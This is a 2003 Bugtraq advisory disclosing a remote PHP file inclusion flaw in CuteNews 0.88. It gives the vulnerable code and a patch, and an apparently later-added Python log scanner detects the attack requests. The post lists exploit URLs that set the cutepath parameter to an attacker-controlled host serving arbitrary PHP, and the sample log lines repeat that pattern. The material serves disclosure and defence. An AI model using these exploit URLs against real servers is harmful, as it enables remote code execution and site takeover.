Bugtraq mailing list archives
PHP code injection in CuteNews
From: "Over_G" <overg () mail ru>
Date: Tue, 25 Feb 2003 14:31:55 +0300
PHP source code injection in CuteNews

Information :
===============================================
Script : CuteNews v0.88
Official site : http://air.langame.net/
===============================================
PHP Scripts :
===============================================
shownews.php :

if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");
===============================================
search.php :

require_once("$cutepath/config.php");
===============================================
comments.php :

if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
===============================================
Exploits :

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/

with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt

Content config.php or news.txt: Any PHP Code.
===============================================
Patch :

Replace
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
with
$cutepath=".";
===============================================
Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG () mail ru VenoM88 () mail ru
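An added example, not part of the original post: a Python check over web-server access logs for the request pattern the advisory shows, where `cutepath` is supplied by the client to one of the three listed scripts. The function names, the common/combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The three scripts the advisory lists as including "$cutepath/config.php".
SCRIPTS = {"shownews.php", "search.php", "comments.php"}
# Request target inside a common/combined-format log entry (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with scheme:// makes the include fetch from a URL wrapper.
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

def classify(log_line):
    """Return 'remote', 'override' or None for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if target.path.rsplit("/", 1)[-1].lower() not in SCRIPTS:
        return None
    verdict = None
    # parse_qsl percent-decodes once, which is what the script itself receives.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != "cutepath":          # PHP variable names are case-sensitive
            continue
        if SCHEME.match(value.strip()):
            return "remote"
        verdict = "override"            # path supplied by the client, still unexpected
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE = [
    '192.0.2.10 - - [25/Feb/2003:14:40:01 +0300] "GET /cutenews/shownews.php?id=5 HTTP/1.0" 200 5120',
    '192.0.2.66 - - [25/Feb/2003:14:41:13 +0300] "GET /cutenews/shownews.php?cutepath=http://attacker.example/ HTTP/1.0" 200 812',
    '192.0.2.66 - - [25/Feb/2003:14:41:20 +0300] "GET /cutenews/search.php?cutepath=HTTP%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 640',
    '192.0.2.31 - - [25/Feb/2003:14:43:02 +0300] "GET /cutenews/comments.php?id=5&cutepath=../data HTTP/1.0" 200 2048',
    '192.0.2.31 - - [25/Feb/2003:14:44:47 +0300] "GET /cutenews/index.php?cutepath=http://attacker.example/ HTTP/1.0" 404 210',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE):
        print(n, verdict)
```

An access log records only the query string, so this covers the request form shown in the advisory and nothing else.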